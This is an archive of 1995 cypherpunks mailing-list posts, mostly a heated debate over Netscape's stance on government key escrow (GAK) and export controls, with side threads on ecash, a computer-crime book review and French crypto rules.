> badly to start raking in some profits.

  What I meant, and have said in other places, is that if it is legal to
ship a product without GAK for use inside the US, or anywhere else,
I believe we will do it, because that is what our customers want.

> The title "Software Munitions Expert" or similar such should probably be
> changed to "GAK marketing expert" however.

  I'm sorry my dig at the ITAR does not amuse you.  Your suggested
replacement would not be appropriate since I don't support GAK (I believe
that it is one of the most evil things any government could do to its
citizens), and I'm not in marketing.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sun, 3 Dec 1995 14:04:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512030545.AAA01728@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The recent flap over Netscape and GAK ought to serve as a wakeup call and
a reminder of the advantages the anarchistic GNU/FSF paradigm of software 
development has over the corporate model.

No one can control GNU code, and no entity can impose changes on everyone
else.  If everyone was using GNU browsers and ssl servers right now we'd
be safe.

Competing with Netscape is obviously something that's easier said than
done.  But we ought to consider the strategic importance of having robust,
free, open source packages for security applications, even if affordable
and high quality commercial products exist. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 17:10:11 +0800
To: cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu>
Message-ID: <30C16484.443@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> Why not say:
> 
>         1       Netscape will follow all laws and regulations.
>         2       The current rules are forcing Netscape to choose
>                 between providing reasonable levels of privacy
>                 to its customers and competing in the international
>                 marketplace.
>         3       Netscape feels the rules should be changed to make
>                 this choice unnecessary.

  I think this is what we are trying to do.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Dec 1995 17:06:51 +0800
To: sameer <sameer@c2.org>
Subject: Re: prototype slot-machine
Message-ID: <199512030850.AAA03618@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 PM 12/2/95 -0800, sameer wrote:
>	I've written up a slot-machine thing for ecash, very
>experimental, very buggy, not very slick, (i'd like to get the
>technical bugs worked out before i put a fancy wrapper on it) and i'd
>*like* to announce it here for testing, but I'm worrying about
>gambling laws.. 
>	any thoughts?

Use the demo digicash; it's not real money, and it's never been
illegal to play for poker chips.  The mere fact that there's an exchange
market for real money vs. digicash play money doesn't change that.  
It'd be nice if you take small bets, since many of us only have $100
or so of play money; quarters should be fine.

To do the job right, you need audio....
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 17:14:30 +0800
To: cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <2.2b7.32.19951203004908.0087902c@mail.teleport.com>
Message-ID: <30C1660F.47EA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> 
> At 11:01 PM 12/1/95 -0800, you wrote:
> >
> >  I had lunch with Jim Clark today, and explained the furor that was
> >currently going on in cypherpunks and elsewhere.  After lunch he sent
> >me the e-mail that I've attached below to pass along.  I think the gist
> >of it is that if governments require key escrow, we will have to do it
> >in order to sell our products with encryption into those countries.
> [rest removed for brevity]
> 
> Well someone has to say it...
> 
> "I am glad to see that Jim Clark is no longer hocking up GAK."
> 
> I just hope Netscape does not get seduced by the dark side of the feds and
> implement GAK "because they have to".  It is one thing to have cryptography
> that is brute forcable in a few weeks, it is another to have a secret key
> that some nosey government agent can use to decrypt it in seconds.  If Netscape
> implements GAK I will move to something else because I will not be able to
> trust that some other nasty surprise will exist in the software.  (As well
> as having no real security left in the product.)

  I don't think you will ever be in this position.  If we are forced to implement
GAK by the government, everyone else will too.

> Do I believe that Netscape will implement GAK in the near future?  Not
> really.  Not unless they go through another purge like the one back in
> February(?), but I do not see that as being very likely.  (With the current
> IPO, news of an employee purge would probably drive down the stock and that
> would be the last thing the top brass would want.)

  There was never a "purge" in Netscape engineering.  What you are referring
to happened right before I got here.  As I understand it, it was localized
to the customer support organization (which is why you know about it I assume),
and mostly involved contractors.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 17:20:46 +0800
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au>
Message-ID: <30C16890.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> PeterWiltshire writes:
> > I emailed Jim Clark day before yesterday about his comments re key escrow.
> > He responded.  As it's not good form to post private email, might I suggest
> > that one of the 'elders' here put to Jim a list of questions on the proviso
> > that his answers can be posted to the list.  You never know, a lot of
> > speculation might be confirmed or denied.
> 
> Why doesn't he just post on his own? Its not like this mailing list is
> unknown -- we got him bad press on the cover of the Times in the
> past. Anyone is free to send email here.

  Jim offered to send to the list directly, but given the recent gripes
about non-subscribers spamming the list, I thought it might be in bad
form, and offered to forward it to the list for him.  He doesn't really
have time to read cypherpunks himself.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 17:34:12 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <30C162DD.1E2F@netscape.com>
Message-ID: <199512030920.BAA11667@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   Can't I be a supporter of strong crypto, and also be in it for the money?
> Many people here make good money off of crypto related work.  If I'm asked
> to implement GAK in a situation where it is not mandated by law, I won't
> do it.

	Yes. You don't have to work at Netscape to make money doing
crypto. Witness the various crypto-related startups who do not support
key escrow. Comsec partners, electric communities, community
connexion, etc.
	(Not that you can't be a supporter of strong crypto and work
for netscape at the same time. The jury [in my mind] is still out on
that one)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 18:31:42 +0800
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C0EE0D.48A9@netscape.com>
Message-ID: <30C178F1.1DC3@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Sat, 2 Dec 1995, Jeff Weinstein wrote:
> 
> > Black Unicorn wrote:
> 
> > > AT&T seems to have been suitably 'incentivized'
> > > The receipt of government funding (in whatever guise) might be just as
> > > powerful in this case.
> > >
> > > To the outsider, it looks as if Netscape 'owes' the government.
> >
> >   We do owe the government.  They have paid us for Servers and Clients
> > that support Fortezza.  That is what we owe them.  The money that the
> > NSA gave us for Fortezza is not very significant compared to what we
> > are getting from commercial sources.
> 
> Obviously it was significant enough to take.  It was also a perfect
> opportunity for Netscape to express concerns about the future of the
> technology, which is in netscape's interest.  The astute deal maker would
> be happy to work with the NSA on his own terms.  Instead, it
> would appear that Netscape is working FOR NSA on their terms.

  I wasn't aware that you were privy to the details of the contract.

> > > > We are actively lobbying in washington to get clarification of the
> > > > current regulations so that we can provide the US version via an "export
> > > > controlled" FTP or HTTP download.
> > >
> > > With which firm?  Or have you made it an in-house effort?
> >
> >   We have recently hired a government liaison person to manage our policy
> > discussions with the government.  He is one of the people that will be
> > talking to congressional and white house representatives next week.
> > I don't know if we have made use of any outside lobbying firms.
> 
> I'd be interested to know what a 'government liaison person' is.  It
> sounds to me like an 'in house lobbyist.'  There is an old joke in the
> beltway about in house lobbyists.
> 
> I also would like to know why you are actively lobbying for
> 'clarification' rather than 'modification' of the current policy.

  We are asking for both.  We want to know what we have to do to make
our US version available for FTP download to everyone who is legally
allowed to use it, without violating the current law.  We also want
the export restrictions removed so that we can ship the same stuff
to other countries.  The former is a short term goal while the
latter will likely turn into a longer term effort.

> Netscape seems to be taking the position, "We'd love it if you'd let us
> do X, but we are happy to roll over for whatever."

  So you consider not breaking the law to be "rolling over"?  You have
the luxury of hiding behind anonymity.  We don't.

>  and  "By the way,
> what is the rule on exporting software again?"

  Doesn't everyone want to know this?  Do you think that the ITAR is clear
about the meaning of "export" in the case of FTP and the internet?

> I am impressed that some effort is being made.  I think it in the form of
> 'too little, too late.'  But hey, who am I?

  Four months ago we did not have lots of money in the bank.  People seem
to forget that this is still a young and small company.  Perhaps the current
valuation is blinding obscuring this.  Now that we have more resources at our
disposal hopefully we can help make a difference.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Sun, 3 Dec 1995 10:28:14 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951202200809.12018A-100000@polaris.mindport.net>
Message-ID: <30c10224.23418425@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn
<unicorn@schloss.li> wrote:

>On Sat, 2 Dec 1995, Jeff Weinstein wrote:
>
>> Black Unicorn wrote:
>
>> > AT&T seems to have been suitably 'incentivized'
>> > The receipt of government funding (in whatever guise) might be just as
>> > powerful in this case.
>> > 
>> > To the outsider, it looks as if Netscape 'owes' the government.
>> 
>>   We do owe the government.  They have paid us for Servers and Clients
>> that support Fortezza.  That is what we owe them.  The money that the
>> NSA gave us for Fortezza is not very significant compared to what we
>> are getting from commercial sources.
>
>Obviously it was significant enough to take.  It was also a perfect 
>opportunity for Netscape to express concerns about the future of the 
>technology, which is in netscape's interest.  The astute deal maker would 
>be happy to work with the NSA on his own terms.  Instead, it 
>would appear that Netscape is working FOR NSA on their terms.

If you read what they had to say about this, you know that they are
hoping others will create non-escrowed crypto hardware using the same
interface.  I see no reason for them to not include support for any
available hardware system (even if it includes GAK), as long as they
continue to support non-escrowed encryption internally.  This allows
the customer to decide that they have no problem with GAK and use the
external system, or use the internal system and not have GAK.

>> > > We are actively lobbying in washington to get clarification of the
>> > > current regulations so that we can provide the US version via an "export
>> > > controlled" FTP or HTTP download.
>> > 
>> > With which firm?  Or have you made it an in-house effort?
>> 
>>   We have recently hired a government liaison person to manage our policy
>> discussions with the government.  He is one of the people that will be
>> talking to congressional and white house representatives next week.
>> I don't know if we have made use of any outside lobbying firms.
>
>I'd be interested to know what a 'government liaison person' is.  It 
>sounds to me like an 'in house lobbyist.'  There is an old joke in the 
>beltway about in house lobbyists.
>
>I also would like to know why you are actively lobbying for 
>'clarification' rather than 'modification' of the current policy.

Until the current policy is clearly defined it is like a moving
target.  Once the government has been pinned down to a single policy,
it will be much easier to dispute their policies.  Currently the
government can say anything they want about their enforcement of ITAR,
because they have not stated a clear set of rules with regard to it.
Once they have set clear rules, those rules can be shown to be overly
restrictive or even unenforceable.

Also, lawyers usually advise clients based on a worst case scenario,
thus when the government is unclear on its rules, the lawyers advise
their clients based upon the worst possible interpretation of the law.
This is done to protect their client.  By not stating a policy, the
government is making that worst case happen, without having to be the
bad guy by actually attempting to enforce such a policy.

>
>Netscape seems to be taking the position, "We'd love it if you'd let us 
>do X, but we are happy to roll over for whatever."  and  "By the way, 
>what is the rule on exporting software again?"
>
>I am impressed that some effort is being made.  I think it in the form of 
>'too little, too late.'  But hey, who am I?

I think you are being too critical, they have done more than any
company I know of to make easy to use crypto widely available.  They
may be willing to obey the laws if they require GAK, but I do not feel
that they are just rolling over either.  I strongly oppose GAK, but I
do not believe that no crypto is better than GAK crypto.  I would
rather keep some people out than nobody out.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 1995 09:32:34 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512030120.CAA06452@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen <alano@teleport.com> wrote:
>>Is there any way one could set up a dirty pictures web
>>page in such a fashion that it would be difficult, painful,
>>and impractical to get at the pictures through that page
>>with a netscape browser?
>
>It would not be very hard.  You just need to have all connections go through
>a CGI script first.  There is a variable that reports the client to the
>server.  Just bounce them to an error if the variable starts with "Mozilla"
>
>Also, you do not need access to the server code to do this if you are using
>NCSA.  There is a way you can force execution of CGI scripts from your local
>directory using an .htaccess file.  (It requires using an "addtype" command
>to enable the cgi parsing.)  I will have to dig out the exact mime type
>required.

A much simpler method exists for serving special documents dependent on
client profile, provided you are using Apache 0.8.x (I know sameer is). See
http://www.apache.org/docs/content-negotiation.html

I suppose someone should ask: what is the crypto relevance of this thread?
None.

Wilhelm Busch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 1995 09:56:00 +0800
To: cypherpunks@toad.com
Subject: Fight.comp.crime.like.a.paranoid.FBI.psycho
Message-ID: <199512030145.CAA06945@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Coming to Terms with Computer Crime

   Computer Crime: A Crimefighter's Handbook
   David Icove, Karl Seger, and William VonStorch
   O'Reilly and Associates Inc., $24.95; 800-998-9938
   ISBN: 1-56592-086-4.

By Don Willmot

If you tend to be a paranoid type of person, Computer
Crime: A Crimefighter's Handbook will keep you up at
night pondering the incredible number of computer crimes
that people can commit and the difficulties involved in
stopping them.

The book, split into sections that deal with defining
computer crimes, preventing them, and handling them, is
loaded with fascinating facts. When you stop to think
about it, the number of different types of crime is
alarming: sabotage, revenge, vandalism, theft,
eavesdropping, even "data diddling." For each type of
attack, the book suggests preventive measures and
strategies, all in commonsense style and plain English.

You'll feel like an FBI agent as you read the personality
profiles of different types of computer criminals.
Hackers, crackers, and vandals are all psychoanalyzed,
and interesting charts of "vulnerabilities" and
"countermeasures" will help you make plans to keep your
organization safe from outside attack. The book includes
discussions of everything from choosing locks and keys to
interviewing personnel, setting up "concentric circles"
of defense perimeters, and forming a crisis-management
team to handle the fallout from a successful computer
crime. There's even an entire page devoted to all the
passwords you should never use.

Almost one-third of the book is given over to the actual
text of federal and state laws used to prosecute computer
crime. This section is meant not to be read but to be
used instead as a reference.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Dec 1995 17:06:31 +0800
To: cypherpunks@toad.com
Subject: Re: Questions/Comments on ecash protocol (fwd)
Message-ID: <v02120d00ace710acf043@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
[parts elided]

>BTW since apparently both deposit and payment messages are not encrypted,
>coins made out to "@" are in danger of being stolen both while en route
>from customer to shop and from shop to bank.  This is significant from
>the point of view of payee anonymous systems, which will need to use such
>coins.  More encryption will be necessary when such coins are passed
>around.

Absolutely. Wildcard coins are stealable in transit. However, one might
safely assume that transactions conducted using such coins be encrypted by
other methods.

>Well, I would think identification of the payer's bank will be
>necessary for any coin based system so you know where to cash in the
>coins, so I don't think this is going to go away.  Of course as of now
>everyone has the same bank so it is not an issue.

Your analysis is correct. The good news, for the free marketers on this
list :-), is that there will be other banks issuing Ecash in the near
future. However, they are unlikely to offer the flexibility you have with
Mark Twain Bank.

>There is no such thing!  This is one of the most common misconceptions.
>This version of ecash does not trace double spenders.  It prevents double
>spending by checking each coin to make sure it has not already been
>spent.  Tracing of double spending is only necessary in offline systems
>where coins are not checked right away, but that is not present here.

True.

>Very good comments.  I'm sure the next version will be much better if
>they are careful to clear up the kinds of issues you have raised.

Will do.

<insert standard disclaimer here>


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 3 Dec 1995 17:54:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: French crypto restrictions - update ?
In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com>
Message-ID: <199512030829.DAA17614@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, this has nothing to do with Netscape's position on GAK:

Jim Clark writes (via Jeff Weinstein):
> Until recently, France did not even
> allow us to sell products with 40-bit keys, much less 128-bit keys.

I'm curious about this. Were Chirac et compagnie simply dragging their feet
on granting a license, have they made an actual policy change, or did they
realize they could do what Damien did ? It would be interesting to see more
information on this development. (There's a paranoid conspiracy theory I
could add to the pile here, but I don't believe it and we seem to be knee-deep
in them at the moment....)

-Futplex <futplex@pseudonym.com>
Let's wait and see






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sun, 3 Dec 1995 19:02:35 +0800
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <199512031053.DAA24346@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been to Congress.
I have lobbied them personally.

Oct 2nd & 3rd was when.
It wasn't easy.

I also spent time in the Press Galleries.
That was even harder.
I will be there next October, and will be credentialed
for all four of the different galleries.

Mr. Jeff get real.
Your company is now on the record for GAK.
It hadn't until then. But now you are.
Now all the lower levels can decry what Mr. Clark said,
but the damage is already done.

And....if you're not, Mr. Jeff, this being the electronic
age and all, why not get Mr. Clark to clarify it, muddy it,
or downright repudiate it as a misquote or something.

I'd love to see that.
So would a lot of others.

But somehow I don't think that is gonna happen.

Love Always,

Carol Anne
ps censored.org is now running ftp at 206.42.112.96 
   on an intermittent basis using serveu1.1 


>Black Unicorn wrote:
>> 
>> On Sat, 2 Dec 1995, Jeff Weinstein wrote:
  
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Dec 1995 02:21:52 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C178F1.1DC3@netscape.com>
Message-ID: <Pine.SUN.3.91.951203053958.24122A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:
> > 
> > On Sat, 2 Dec 1995, Jeff Weinstein wrote:
> > 
> > > Black Unicorn wrote:

> > > > To the outsider, it looks as if Netscape 'owes' the government.
> > >
> > >   We do owe the government.  They have paid us for Servers and Clients
> > > that support Fortezza.  That is what we owe them.  The money that the
> > > NSA gave us for Fortezza is not very significant compared to what we
> > > are getting from commercial sources.
> > 
> > Obviously it was significant enough to take.  It was also a perfect
> > opportunity for Netscape to express concerns about the future of the
> > technology, which is in netscape's interest.  The astute deal maker would
> > be happy to work with the NSA on his own terms.  Instead, it
> > would appear that Netscape is working FOR NSA on their terms.
> 
>   I wasn't aware that you were privy to the details of the contract.

Tell me it included discussion about the future of the technology, and 
that at some time during the negotiations the prospect of GAK and 
netscape's concern over the direction of it was discussed.  In the 
alternative, shut up.

It doesn't take a legal genius to figure out what went on in these 
negotiations.  I've been there.  I know what the agendas are, and it's 
clear GAK was not one of them.  Either show me otherwise or sit down.

(And by the way, to brag and make you eat crow, I have seen portions of the 
agreement, and your legal staff is as full of leaks as the titanic.  You
would be wise to pull that card only when you are sure it's not been exposed.
Your agreement is another reason I pulled my stock.  My biggest regret is 
that I don't trust my anonymity enough to publish the portions I have).

> > I'd be interested to know what a 'government liaison person' is.  It
> > sounds to me like an 'in house lobbyist.'  There is an old joke in the
> > beltway about in house lobbyists.
> > 
> > I also would like to know why you are actively lobbying for
> > 'clarification' rather than 'modification' of the current policy.
> 
>   We are asking for both.  We want to know what we have to do to make
> our US version available for FTP download to everyone who is legally
> allowed to use it, without violating the current law.  We also want
> the export restrictions removed so that we can ship the same stuff
> to other countries.  The former is a short term goal while the
> latter will likely turn into a longer term effort.

At no time in here do I hear that you will be actively taking an 
'anti-GAK' position.  That is, that GAK is counterproductive, against the 
interests of the industry and that Netscape is going to take a stand on 
GAK because it is wrong for the industry as a whole.

I don't care what your position is on GAK, I've already sold my stock in 
your spineless company.  What I care about is exactly what kind of 
snowjob you are perpetrating after the fact while claiming to be one of us.

> 
> > Netscape seems to be taking the position, "We'd love it if you'd let us
> > do X, but we are happy to roll over for whatever."
> 
>   So you consider not breaking the law to be "rolling over"?

You seem to think the only options are:

1. Roll over.
2. Break the law.

This is where you fail.

The other option is active work to discourage a GAK system on the whole 
as a farce, and unenforceable, thus a waste and a burden to the industry 
(which in my view, it is).

Unfortunately, Netscape is too interested, clearly, in not rocking the 
boat while the gold is on board.  Again, this is fine, so long as you 
don't come to us claiming to be the peacemaker.  That's crap.

> You have the luxury of hiding behind anonymity.  We don't.

No apologies necessary.

> >  and  "By the way,
> > what is the rule on exporting software again?"
> 
>   Doesn't everyone want to know this?  Do you think that the ITAR is clear
> about the meaning of "export" in the case of FTP and the internet?

No.  I don't care what is.  As long as it is not "we know strong crypto 
is inevitable, and thus we cannot hope to enforce a lesser standard," 
then it is clearly unacceptable -  (See Bill Gates, who despite my 
provincial mac preference, has earned my investment dollar ten times over on
ethics issue v. netscape.  I hope you realize exactly what that means).

> > I am impressed that some effort is being made.  I think it in the form of
> > 'too little, too late.'  But hey, who am I?
> 
>   Four months ago we did not have lots of money in the bank.  People seem
> to forget that this is still a young and small company.  Perhaps the current
> valuation is blinding obscuring this.  Now that we have more resources at our
> disposal hopefully we can help make a difference.

All the smallest violins in the world are, I am sure, playing for you.

You'd make a difference if you would evolve to the point where you have a 
backbone.  Given your position in the short lived 'hype' of the high tech 
market, I would think you would make as much of your time in the 
spotlight as you could.  Especially if the market ever wises up to the 
snowjob you are doing.  (I speak of the company, if not the individual, 
not that I doubt either of the capacity individually).


> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 
---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Dec 1995 18:14:06 +0800
To: Dan Weinstein <djw@pdcorp.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30c10224.23418425@email.pdcorp.com>
Message-ID: <Pine.SUN.3.91.951203060612.24122C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Dan Weinstein wrote:

> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn
> <unicorn@schloss.li> wrote:
> 
> >On Sat, 2 Dec 1995, Jeff Weinstein wrote:
> >
> >> Black Unicorn wrote:

> >> > To the outsider, it looks as if Netscape 'owes' the government.
> >> 
> >>   We do owe the government.  They have paid us for Servers and Clients
> >> that support Fortezza.  That is what we owe them.  The money that the
> >> NSA gave us for Fortezza is not very significant compared to what we
> >> are getting from commercial sources.
> >
> >Obviously it was significant enough to take.  It was also a perfect 
> >opportunity for Netscape to express concerns about the future of the 
> >technology, which is in netscape's interest.  The astute deal maker would 
> >be happy to work with the NSA on his own terms.  Instead, it 
> >would appear that Netscape is working FOR NSA on their terms.
> 
> If you read what they had to say about this, you know that they are
> hoping others will create non-escrowed crypto hardware using the same
> interface.  I see no reason for them to not include support for any
> available hardware system (even if it includes GAK), as long as they
> continue to support non-escrowed encryption internally.  This allows
> the customer to decide that they have no problem with GAK and use the
> external system, or use the internal system and not have GAK.

I read it quite carefully.  I just was not as easily taken in by the 
double speak as you were.

Hoping others will do something is about as useful as sitting on your thumb.

Netscape is in a position to make some policy impact here.  If they 
insist on going another way, I want to hear why, not that they are all on 
our side and we should be nice because really we're all in this together, 
and after all, Netscape isn't such a bad lot.

They can support whoever they like.  I just want to hear WHY.  More 
importantly, I don't want to be snowed with some horse hockey answer.  It 
insults my intelligence.  Yours was obviously unaffected.

> >I'd be interested to know what a 'government liaison person' is.  It 
> >sounds to me like an 'in house lobbyist.'  There is an old joke in the 
> >beltway about in house lobbyists.
> >
> >I also would like to know why you are actively lobbying for 
> >'clarification' rather than 'modification' of the current policy.
> 
> Until the current policy is clearly defined it is like a moving
> target.  Once the government has been pinned down to a single policy,
> it will be much easier to dispute their policies.  Currently the
> government can say anything they want about their enforcement of ITAR,
> because they have not stated a clear set of rules with regard to it.
> Once they have set clear rules, those rules can be shown to be overly
> restrictive or even unenforceable.

I believe you actually think you are teaching me something here.

I said before, and I will say again.  If Netscape is against GAK, then 
let them be AGAINST GAK.  If they are just going to try and finesse their 
way into the market without making too many waves, let's hear it that way 
instead of some crap about how they are 'lobbying actively against GAK' 
(Which I might point out, is an assertion that fell apart at the most 
basic prodding).

> Also, lawyers usually advise clients based on a worst case scenario,
> thus when the government is unclear on its rules, the lawyers advise
> their clients based upon the worst possible interpretation of the law.
> This is done to protect their client.  By not stating a policy, the
> government is making that worst case happen, without having to be the
> bad guy by actually attempting to enforce such a policy.

I really think you are pompous enough to think you are teaching people 
things they don't know here.

I invite you to re-read the entire conversation and discover, as an 
exercise, that the issue is not what the government is or is not doing, 
but what netscape is or is not doing.  I could care about Netscape's 
loose-lipped lawyers.

> >
> >Netscape seems to be taking the position, "We'd love it if you'd let us 
> >do X, but we are happy to roll over for whatever."  and  "By the way, 
> >what is the rule on exporting software again?"
> >
> >I am impressed that some effort is being made.  I think it in the form of 
> >'too little, too late.'  But hey, who am I?
> 
> I think you are being too critical, they have done more than any
> company I know of to make easy to use crypto widely available.

0 + .00001 = .00001

Yes, just as last time you checked, .00001 is still more than 0.

> They
> may be willing to obey the laws if they require GAK, but I do not feel
> that they are just rolling over either.  I strongly oppose GAK, but I
> do not believe that no crypto is better than GAK crypto.  I would
> rather keep some people out than nobody out.

Your ignorance is assuming that the options you present are the only 
options available.  JW made the same mistake.  In logical discourse this 
is called "narrowing the field."  It's a version of the 'straw man' 
and a classic flaw in logical argument.
 
> Dan Weinstein
> djw@pdcorp.com
> http://www.earthlink.net/~danjw
> PGP public key is available from my Home Page.
> All opinions expressed above are mine.
> 
> "I understand by 'freedom of Spirit' something quite definite -
> the unconditional will to say No, where it is dangerous to say
> No.    

This has got to be the most ironic of signatures I have ever seen.

Why don't you begin to apply the cute quotes you put in your .sig to real 
life and tell Netscape to grow a backbone and say 'No.' to GAK?
    
>            Friedrich Nietzsche

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 1995 20:00:06 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <30C162DD.1E2F@netscape.com>
Message-ID: <Pine.SUN.3.91.951203063154.24122F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:
